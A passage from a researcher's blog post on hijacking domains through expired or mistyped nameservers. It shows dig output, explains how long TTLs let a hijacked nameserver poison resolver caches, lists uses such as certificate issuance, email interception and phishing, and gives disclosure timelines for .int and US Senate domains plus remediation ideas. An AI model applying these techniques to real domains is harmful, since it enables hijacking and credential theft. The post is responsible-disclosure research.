int.            52121    IN    NS
int.            52121    IN    NS
int.            52121    IN    NS

;; Query time: 38 msec
;; WHEN: Sun Dec 18 00:23:29 2016
;; MSG SIZE  rcvd: 153

We’ll pick one of these at random ( and ask for the nameservers of a few times:

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:        86400    IN    NS        86400    IN    NS        86400    IN    NS        86400    IN    NS

;; Query time: 76 msec
;; WHEN: Sun Dec 18 00:23:35 2016
;; MSG SIZE  rcvd: 127

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14215
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:        86400    IN    NS        86400    IN    NS        86400    IN    NS        86400    IN    NS

;; Query time: 79 msec
;; WHEN: Sun Dec 18 00:23:36 2016
;; MSG SIZE  rcvd: 127

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31489
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:        86400    IN    NS        86400    IN    NS        86400    IN    NS        86400    IN    NS

;; Query time: 87 msec
;; WHEN: Sun Dec 18 00:23:37 2016
;; MSG SIZE  rcvd: 127

As can be seen above, each time we ask we get the nameservers in a different order. This is the beauty of round robin DNS since each nameserver will receive roughly equal load of DNS queries. However this complicates our attack because half of the time users will be querying the legitimate nameservers! So the question now becomes how can we tip the odds in our favor?

May the RR Odds Be Ever in Our Favor

So, we can’t control the behaviour of the .int TLD servers and we’ll only be chosen approximately 50% of the time. As an attacker we need to figure out how to make that closer to 100%. Luckily, due to how DNS is structured, we can get very close.

When you visit and your computer does a DNS lookup for that record, it likely isn’t going to traverse the entire DNS tree to get the result. Instead it likely makes use of a DNS resolver which will perform this process on your behalf while caching all of the results. This resolver is assigned to your computer during the DHCP process and can be either a large shared resolver (such as, or or a small resolver hosted on your local router or computer. The idea behind the resolver is that it can serve many clients making DNS requests and can speed up resolution by caching results. So if one client looks up and shortly after another client does the same, the DNS tree doesn’t have to be traversed because the resolver already has a cached copy. The important point to realize here is that in DNS, caching is king. The side effects of this architecture are made more apparent when events like the DDoS attacks against Dyn that knocked the Internet offline for millions of users happen. As it turns out when you put all your eggs in one basket, you’d better be sure the basket can hold up.

Caching is accomplished by DNS resolvers temporarily storing the results of a DNS query for whatever the response’s TTL has been set to. This means that if a response has a TTL of 120, for example, the caching resolver likely will obey this and return this same record for two minutes. There are upper limits to this value, but its resolver-dependent and likely can be set as long as a week without problems.

Given this situation, we can win this game by setting longer TTLs that our legitimate servers for all of our authoritative responses. The situation essentially boils down into this:

  • User looks up the A record for to visit the site.
  • Due to the random choosing of nameservers from the .int TLD NS query results, the user has a 50% chance of choosing our poisoned nameserver.
  • Say the user doesn’t choose us and gets the legit nameservers, their resolver will record this result and cache it for the specified TTL of 21,745 seconds (approximately 6 hours). This is the current TTL for this record at the time of this writing.
  • Later on, the user attempts to visit the website after more than 6 hours have passed, again they traverse this tree but this time they get one of our malicious nameservers which we’ve taken over. We reply with a TTL of 604,800 seconds (one week), or with an even longer TTL depending on what we think we can get away with. The user’s cache records this value and will hold it for the length of the TTL we specified.
  • Now for an entire week the user, and, more importantly, all the other clients of the resolver will always use our falsified record.

This example becomes more extreme when you realize that many people and services make use of large resolvers like Google’s public resolvers (, or Dyn’s (, On this level its only a matter of time until the resolver picks our poisoned nameservers and we can poison all clients of this resolver (potentially millions) for a long period of time. Even better, with large resolvers we can easily test to see if we’ve succeeded and can act quickly when we know we’ve poisoned the community cache.

The Power of DNS

So, we now can poison the DNS for our target – but what power does this give us? What can we do with our newly gained priveleges?

  • Issue arbitrary SSL/TLS certificates for Due to the fact that many certificate authorities allow either DNS, HTTP, or email for domain name verification, we can easily set DNS records for servers we control to prove we own the target domain. Even if the CA chooses our target’s nameservers instead of ours, we can simply request again once the cache expired until they eventually ask our malicious nameservers. This assumes the certificate authority’s certificate issuing system actually performs caching – if it doesn’t we can simply immediately try again until our malicious servers are picked.
  • Targeted Email Interception: Since we can set MX records for our targets, we can set up our malicious servers to watch for DNS requests from specific targets like GMail, Yahoo Mail, or IANA’s mail servers and selectively lie about where to route email. This gives us the benefit of stealth because we can give legitimate responses to everyone querying except for the targets we care about.
  • Takeover of the .int Domain Name Itself: In the case of the .int TLD, if we want to change the owners or the nameservers of this domain at the registry, both the Administrative contact and the Technical contact must approve this change (assuming the policy is the same as IANA’s policy for root nameserver changes which IANA also manages). You can see the example form here on IANA’s website. Since both of the email addresses on the WHOIS are at as well, so we have the ability to intercept mail for both. We can now wait until we see an MX DNS request from IANA’s IP range and selectively poison the results to redirect the email to our servers, allowing us to send and receive emails as the admin. Testing to see if IANA’s mail servers have been poisoned can be achieved by spoofing emails from and checking if the bounce email is redirected to our malicious mail servers. If we don’t receive it we simply wait until the TTL of the legit mail servers is over and try again.
  • Easily Phish Credentials: Since we can change DNS we can rewrite the A records to point to our own phishing servers in order to steal employee credentials/etc.
  • MITM Devices via SRV Spoofing: Since we can also control SRV records, we can change these to force embedded devices to connect to our servers instead. This goes for any service which uses DNS for routing (assuming no other validation method is built into the protocol).
  • And much more…

So clearly this is a vulnerability which can occur but does it occur often? Sure maybe one random .int website has this vulnerability but do any actually important websites suffer from this issue?

Not An Isolated Incident

The following is a screenshot from another website which was found to suffer from this same vulnerability as This time from something as simple as a typo in the nameserver hostname:


The vulnerable domain was an internal URL shortening service for the United States Senate. The domain had a non-existent domain of set as an authoritative nameserver. This was likely a typo of which is a sub-domain belonging to Akamai, this slight mistype has caused a massive security issue where you want it the least. Since the site’s very purpose is to redirect what is assumedly members of the US Senate to random sites from links sent by other members it would be a goldmine for an attacker wishing to do malicious DNS-based redirection for a drive-by exploitation or targeted phishing attacks. Due to the high risk and trivial exploitability of the issue I purchased the nameserver domain myself and simply blocked DNS traffic to that domain (allowing the DNS queries to fail over to the remaining working servers). This essentially “plugged” the issue until it could be fixed by the administrators of the site. Shortly after this I reached out to the .gov registry who forwarded my concerns to the site’s administrators who fixed the issue extremely quickly (see disclosure timeline below). All said and done very impressive response time! This does, however, highlight that this type of issue can happen to anyone. In addition to these two examples outlined here many more exist which are not listed (for obvious reasons), demonstrating that this is not an isolated issue.

Disclosure Timeline

International Organization for Immigration ( Disclosure

  • Dec 09, 2016: Contacted [email protected] with a request to disclose this issue (contact seemed appropriate per their website).
  • Dec 23, 2016: Due to lack of response forwarded previous email to WHOIS contacts.
  • Dec 23, 2016: Received response from Jackson (Senior Information Security Officer for apologizing for missing the earlier email and requesting details of the problem.
  • Dec 23, 2016: Disclosed issue via email.
  • Dec 23, 2016: Confirmed receipt of issue, stating that the problem and implications are understood. States that it will be addressed internally and that an update will be sent when it has been fixed.
  • Dec 27, 2016: Update received from Jackson stating that IANA has been contacted and instructed to remove any reference to the domain in order to remediate the vulnerability. IANA states that this can take up to five business days to accomplish.
  • Dec 27, 2016: Asked if Jackson would also like the domain name back or if it should be left to expire.
  • Dec 27, 2016: Jackson confirms the domain name is no longer needed and it’s fine to let it expire.

Disclosure Notes: I got a quick response once I forwarded the info to the correct contacts, I should’ve gone for the broader CC with this disclosure and will have to keep that in mind for future disclosures. Didn’t expect such a quick response (or even a dedicated security person) so it was a nice surprise to have Jackson jump on the problem so fast.

United States Senate ( Disclosure

  • January 5, 2017: Reached out to .gov registry requesting responsible disclosure and offering PGP.
  • January 6, 2017: Response received from help desk stating they can forward any concerns to the appropriate contacts if needed.
  • January 6, 2017: Disclosed issue to help desk.
  • January 8, 2017: Nameserver patch applied, all nameservers are now correctly set!

Disclosure Notes: Again, didn’t expect a quick patch like this and was blown away with how quickly this was fixed (less than two days!). In the past government agencies I’ve reported vulnerabilities to have been a super slow process to apply a patch so this was a breathe of fresh air. Really impressed!

Judas DNS – A Tool For Exploiting Nameserver Takeovers

In order to make the process of exploiting this unique type of vulnerability easier I’ve created a proof-of-concept malicious authoritative nameserver which can be used once you’ve taken over a target’s nameserver. The Judas server proxies all DNS requests to the configured legitimate authoritative nameservers while also respecting a custom ruleset to modify DNS responses if certain rule-matching criteria is met. For more information on how it works as well as the full source code see the below link:

Judas DNS Github

Closing Thoughts

This vulnerability has all the trademarks of being a dangerous security issue. Not only is it an easy mistake to make via a typo or an expired nameserver domain, it also does not present any immediately obvious problems for availability due to the failover nature of many DNS clients. This means that not only can it happen to anyone, it means it can also go unnoticed for a long time.

On the topic of remediation, this issue is interesting because it could possibly be mitigated at the TLD-level. If TLD operators did simple DNS health checks to ensure that all domain nameservers had at least the possibility of working (e.g. doing a simple A lookup occasionally to check if an IP address is returned, or look for NXDOMAIN) they could likely prevent this class of hijacking altogether. However, I suspect this would be a heavy handed thing for TLDs to take on and could potentially be prone to error (what about nameservers that only serve private/internal network clients?). After all, if a TLD was to automatically remove nameservers of suspected vulnerable domains and it caused an outage, there would certainly be hell to pay. Still, there is definitely an interesting discussion to be had on how to fix these vulnerabilities at scale.


Thanks to @Baloo and @kalou000 at for being extremely helpful resources on DNS/Internet-related information. Not many people can quote obscure DNS functionality off-hand so being able to bounce ideas off of them was invaluable. Additionally for providing enterprise access to their domain-checking API for security research purposes (such as this project!). This was amazing for checking domain existence because Gandi (as far as I’m aware), has the largest TLD support of any registrar so they were perfect for this research (Nicaragua? Philippines? Random country in Africa? Yep, TLD supported).

Until next time,